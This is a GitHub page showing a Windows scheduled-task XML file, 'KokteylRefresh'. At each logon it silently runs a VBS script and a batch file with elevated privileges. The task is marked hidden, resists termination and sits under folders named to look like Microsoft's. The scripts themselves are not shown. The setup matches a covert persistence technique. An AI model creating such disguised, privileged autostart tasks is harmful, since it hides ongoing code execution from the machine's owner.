-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathKokteylRefresh.xml
49 lines (49 loc) · 3.66 KB
/
KokteylRefresh.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Source>KokteylRefresh</Source>
<Author>KokteylRefresh</Author>
<Description>KokteylRefresh</Description>
<URI>\Microsoft\Windows\Kokteyl\KokteylRefresh</URI>
</RegistrationInfo>
<Triggers>
<LogonTrigger>
<Enabled>true</Enabled>
</LogonTrigger>
</Triggers>
<Principals>
<Principal id="InteractiveUser">
<LogonType>InteractiveToken</LogonType>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>false</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
<RestartOnFailure>
<Interval>PT10M</Interval>
<Count>5</Count>
</RestartOnFailure>
</Settings>
<Actions Context="InteractiveUser">
<Exec>
<Command>%SystemDrive%\MicrosoftCorporation\Tools\Admin\Admin.exe</Command>
<Arguments>--Privileged --NoLogo wscript.exe "%SystemDrive%\MicrosoftCorporation\Kokteyl\Kokteyl.vbs" "%SystemDrive%\MicrosoftCorporation\Kokteyl\KokteylUpdater.bat"</Arguments>
</Exec>
</Actions>
</Task>